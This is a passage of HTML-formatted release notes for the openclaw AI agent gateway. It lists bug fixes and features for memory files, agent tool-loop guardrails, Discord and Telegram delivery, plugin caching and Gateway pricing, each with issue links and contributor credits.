<li>Memory/markdown: replace CRLF managed blocks in place and collapse duplicate marker blocks without rewriting unmanaged markdown, so Dreaming and Memory Wiki files self-heal from repeated generated sections. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363293115" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75491/hovercard" href="https://github.com/openclaw/openclaw/issues/75491">#75491</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363308439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75495/hovercard" href="https://github.com/openclaw/openclaw/pull/75495">#75495</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366593323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75810/hovercard" href="https://github.com/openclaw/openclaw/pull/75810">#75810</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368473075" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76008/hovercard" href="https://github.com/openclaw/openclaw/pull/76008">#76008</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asaenokkostya-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asaenokkostya-coder">@asaenokkostya-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everettjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everettjf">@everettjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lrg913427-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lrg913427-dot">@lrg913427-dot</a>.</li>
<li>Agents/tools: return critical tool-loop circuit-breaker stops as blocked tool results instead of thrown tool failures, so models see the guardrail and stop retrying the same call. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rayraiser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rayraiser">@rayraiser</a>.</li>
<li>Agents/sessions: preserve pre-existing runtime model and context window after heartbeat turns so a per-run heartbeat model override does not bleed into shared-session status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363070391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75452/hovercard" href="https://github.com/openclaw/openclaw/issues/75452">#75452</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Model commands: clarify direct and inline <code>/model</code> acknowledgements for non-default selections as session-scoped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/addu2612/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/addu2612">@addu2612</a>.</li>
<li>Doctor/gateway: stop warning that non-existent, unconfigured user-bin directories are required in the Gateway service PATH. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368545711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76017/hovercard" href="https://github.com/openclaw/openclaw/issues/76017">#76017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/xiphis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiphis">@xiphis</a>.</li>
<li>TUI/setup: skip full provider model normalization during context-window warmup and bound Terminal hatch bootstrap provider requests, avoiding cold-start stalls with large model registries and first-run hatching stuck behind the watchdog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369916791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76241" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76241/hovercard" href="https://github.com/openclaw/openclaw/pull/76241">#76241</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/547895019/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/547895019">@547895019</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents: enable malformed tool-call argument repair for Codex and Azure OpenAI Responses transports while keeping generic OpenAI Responses paths out of the repair gate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359521991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75154" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75154/hovercard" href="https://github.com/openclaw/openclaw/issues/75154">#75154</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nimraakram22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nimraakram22">@Nimraakram22</a>.</li>
<li>Memory Wiki: accept relative Markdown links that include the <code>.md</code> suffix during broken-wikilink validation, avoiding false positives for native render-mode links. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenneth8128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenneth8128">@Kenneth8128</a>.</li>
<li>OpenAI Codex: show the device-pairing code in the interactive SSH/headless prompt while keeping the short-lived code out of persistent runtime logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348981712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74212/hovercard" href="https://github.com/openclaw/openclaw/issues/74212">#74212</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/da22le123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/da22le123">@da22le123</a>.</li>
<li>QA Lab: stop gateway children when the suite parent disappears, so interrupted local QA runs cannot leave hot orphaned gateways behind.</li>
<li>Codex/app-server/plugins: tolerate second connection closes during startup recovery, include retry counts plus stringified restart errors, and allow the official npm Codex plugin to install without the unsafe-install override while keeping <code>/codex</code> command ownership and covering the real npm Docker live path through managed <code>.openclaw/npm</code> dependencies plus uninstall failure proof.</li>
<li>Plugins/CLI: cache plugin CLI registration entries per command program so completion state generation does not repeat the full plugin sweep in one invocation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ScientificProgrammer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ScientificProgrammer">@ScientificProgrammer</a>.</li>
<li>Plugins: reuse gateway-bindable plugin loader cache entries for later default-mode loads without serving default-built registries to gateway-bound requests, reducing repeated plugin registration during dispatch. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210492312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61756/hovercard" href="https://github.com/openclaw/openclaw/issues/61756">#61756</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</li>
<li>Gateway/secrets: include the caught error message in <code>secrets.reload</code> and <code>secrets.resolve</code> warning logs while keeping RPC errors generic, so operators can diagnose reload and permission failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</li>
<li>Providers/OpenRouter/LM Studio/Anthropic: fill DeepSeek V4 <code>reasoning_content</code> replay placeholders for <code>openrouter/deepseek/deepseek-v4-flash</code> and <code>openrouter/deepseek/deepseek-v4-pro</code>, normalize binary LM Studio reasoning metadata from Gemma 4 and other local models, and recover Anthropic-compatible stream text deltas that arrive before their matching content block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368552053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76018" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76018/hovercard" href="https://github.com/openclaw/openclaw/issues/76018">#76018</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368472046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76007" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76007/hovercard" href="https://github.com/openclaw/openclaw/issues/76007">#76007</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cloph-dsp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cloph-dsp">@cloph-dsp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</li>
<li>fix(infra): block workspace state-directory env override [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367841633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75940/hovercard" href="https://github.com/openclaw/openclaw/pull/75940">#75940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>MCP/OpenAI and media: normalize parameter-free MCP tool schemas before OpenAI tool submission, honor explicit short <code>[[tts:text]]...[[/tts:text]]</code> blocks while keeping untagged short auto-TTS suppressed, and accept home-relative <code>MEDIA:~/...</code> attachment paths under the existing file-read policy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362431372" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75362" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75362/hovercard" href="https://github.com/openclaw/openclaw/issues/75362">#75362</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345594550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73758/hovercard" href="https://github.com/openclaw/openclaw/issues/73758">#73758</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346056562" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73796/hovercard" href="https://github.com/openclaw/openclaw/issues/73796">#73796</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tolkonepiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tolkonepiu">@tolkonepiu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fabkury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fabkury">@fabkury</a>.</li>
<li>Hooks/doctor: warn when <code>hooks.transformsDir</code> points outside the canonical hooks transform directory, so invalid workspace skill paths get a direct recovery hint before the Gateway crash-loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367117797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75853/hovercard" href="https://github.com/openclaw/openclaw/issues/75853">#75853</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midobk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midobk">@midobk</a>.</li>
<li>Proxy/audio: convert standard <code>FormData</code> bodies before proxy-backed undici fetches, so audio transcription and multipart uploads no longer send <code>[object FormData]</code> when <code>HTTP_PROXY</code> or <code>HTTPS_PROXY</code> is configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085311223" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48554/hovercard" href="https://github.com/openclaw/openclaw/issues/48554">#48554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dco5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dco5">@dco5</a>.</li>
<li>Discord/setup/startup/native commands: write resolved guild/channel allowlist selections to the selected guild and channel, persist slash-command deploy hashes across process restarts, treat abort-time Carbon reconnect-exhausted events as expected shutdown during stale-socket restarts, allow explicit ack reactions in tool-only guild channels, and warn when slash dispatch or direct plugin execution produces no visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355990759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74922/hovercard" href="https://github.com/openclaw/openclaw/issues/74922">#74922</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186301600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58986/hovercard" href="https://github.com/openclaw/openclaw/issues/58986">#58986</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176861539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58216" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58216/hovercard" href="https://github.com/openclaw/openclaw/pull/58216">#58216</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079837629" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47788/hovercard" href="https://github.com/openclaw/openclaw/pull/47788">#47788</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347363347" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73949" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73949/hovercard" href="https://github.com/openclaw/openclaw/pull/73949">#73949</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213236198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62057" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62057/hovercard" href="https://github.com/openclaw/openclaw/pull/62057">#62057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samvilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samvilian">@samvilian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlueBirdBack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlueBirdBack">@BlueBirdBack</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Eldersonar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Eldersonar">@Eldersonar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Perttulands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Perttulands">@Perttulands</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jb510/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jb510">@jb510</a>.</li>
<li>Discord/delivery/media: use session-backed A2A announce target lookup for multi-account <code>sessions_send</code>, keep typing indicators alive during long tool runs and auto-compaction, preserve multipart Content-Type headers for uploads, preserve attachment and sticker filenames, and keep non-ASCII channel names in session labels while preserving ASCII-slug allowlists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055175543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42652/hovercard" href="https://github.com/openclaw/openclaw/issues/42652">#42652</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195120978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59744/hovercard" href="https://github.com/openclaw/openclaw/issues/59744">#59744</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112523352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51626/hovercard" href="https://github.com/openclaw/openclaw/issues/51626">#51626</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069301815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44773/hovercard" href="https://github.com/openclaw/openclaw/pull/44773">#44773</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347442555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73975" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73975/hovercard" href="https://github.com/openclaw/openclaw/pull/73975">#73975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/irchelper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/irchelper">@irchelper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dpalfox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dpalfox">@dpalfox</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FunJim/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FunJim">@FunJim</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xela92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xela92">@xela92</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockcent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockcent">@rockcent</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/swjeong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/swjeong9">@swjeong9</a>.</li>
<li>Discord/threads/PluralKit: canonicalize proxied webhook turns to the original message id for dedupe, inject thread starter context only on the first effective thread turn, and resolve thread <code>ownerId</code>/<code>parentId</code> from Discord API-style snake_case payload fields so bot-owned autoThreads do not require unnecessary mentions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047195697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41355/hovercard" href="https://github.com/openclaw/openclaw/issues/41355">#41355</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067889287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44447/hovercard" href="https://github.com/openclaw/openclaw/issues/44447">#44447</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067894290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44449" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44449/hovercard" href="https://github.com/openclaw/openclaw/issues/44449">#44449</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgh3326/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mgh3326">@mgh3326</a>.</li>
<li>Gateway/diagnostics: include a bounded redacted startup error message in stability bundles, so crash-loop reports identify the failing plugin or contract without exposing secrets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366332404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75797/hovercard" href="https://github.com/openclaw/openclaw/issues/75797">#75797</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ymebosma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ymebosma">@ymebosma</a>.</li>
<li>Gateway/pricing: defer optional model pricing catalog refresh until after sidecars and channels reach the ready path, so slow OpenRouter or LiteLLM pricing fetches cannot block Gateway readiness. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348322680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74128/hovercard" href="https://github.com/openclaw/openclaw/issues/74128">#74128</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342339751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73486/hovercard" href="https://github.com/openclaw/openclaw/pull/73486">#73486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alprclbi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alprclbi">@alprclbi</a>.</li>
<li>Gateway/pricing: abort in-flight model pricing catalog fetches when Gateway shutdown stops the refresh loop, and avoid post-stop cache writes or refresh timers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331072247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72208" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72208/hovercard" href="https://github.com/openclaw/openclaw/issues/72208">#72208</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rzcq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rzcq">@rzcq</a>.</li>
<li>Codex/app-server: make startup retry cleanup ownership-aware so concurrent Codex lanes cannot close another lane's freshly restarted shared app-server client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet/Twilio/Voice Call: report missing dial-in details during setup, explain that Twilio needs a phone dial plan for Meet URLs, start the phone leg before Meet PIN DTMF, delay intro speech until after post-connect dialing, log each stage, and accept provider call IDs for gateway speak/continue while reporting ended-call state from history.</li>
<li>Control UI/Talk: allow the OpenAI Realtime WebRTC offer endpoint through the Control UI CSP, configure browser sessions with explicit VAD/transcription input settings, and surface OpenAI realtime error/lifecycle events instead of leaving Talk stuck as live with no diagnostic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341743461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73427/hovercard" href="https://github.com/openclaw/openclaw/issues/73427">#73427</a>.</li>
<li>Plugins: clarify config-selected duplicate plugin override diagnostics and document manifest schema updates for bundled-plugin forks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3894832647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/8582" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/8582/hovercard" href="https://github.com/openclaw/openclaw/issues/8582">#8582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sachah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sachah">@sachah</a>.</li>
<li>CLI backends/Claude: make live-session JSONL turn caps bounded and configurable via <code>reliability.outputLimits</code>, raising the default guard for tool-heavy Claude CLI turns while preserving memory limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367015166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75838" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75838/hovercard" href="https://github.com/openclaw/openclaw/issues/75838">#75838</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hcordoba840/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hcordoba840">@hcordoba840</a>.</li>
<li>Telegram/DMs/network/commands: keep incidental <code>message_thread_id</code> reply-with-quote metadata on flat DM sessions unless topic isolation is configured, raise outbound text and typing Bot API guards to 60 seconds with safe timeout overrides and typing fallback retries, and register/clear command menus in default and group-chat scopes so <code>/status</code> and plugin commands stay available in forum topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368172291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75975/hovercard" href="https://github.com/openclaw/openclaw/issues/75975">#75975</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368500963" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76013/hovercard" href="https://github.com/openclaw/openclaw/issues/76013">#76013</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347610813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74032/hovercard" href="https://github.com/openclaw/openclaw/issues/74032">#74032</a>; updates <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3882532827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6457" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/6457/hovercard" href="https://github.com/openclaw/openclaw/pull/6457">#6457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProjectEvolutionEVE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProjectEvolutionEVE">@ProjectEvolutionEVE</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iaki1206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iaki1206">@iaki1206</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dae-sun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dae-sun">@dae-sun</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WouldenShyp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WouldenShyp">@WouldenShyp</a>.</li>
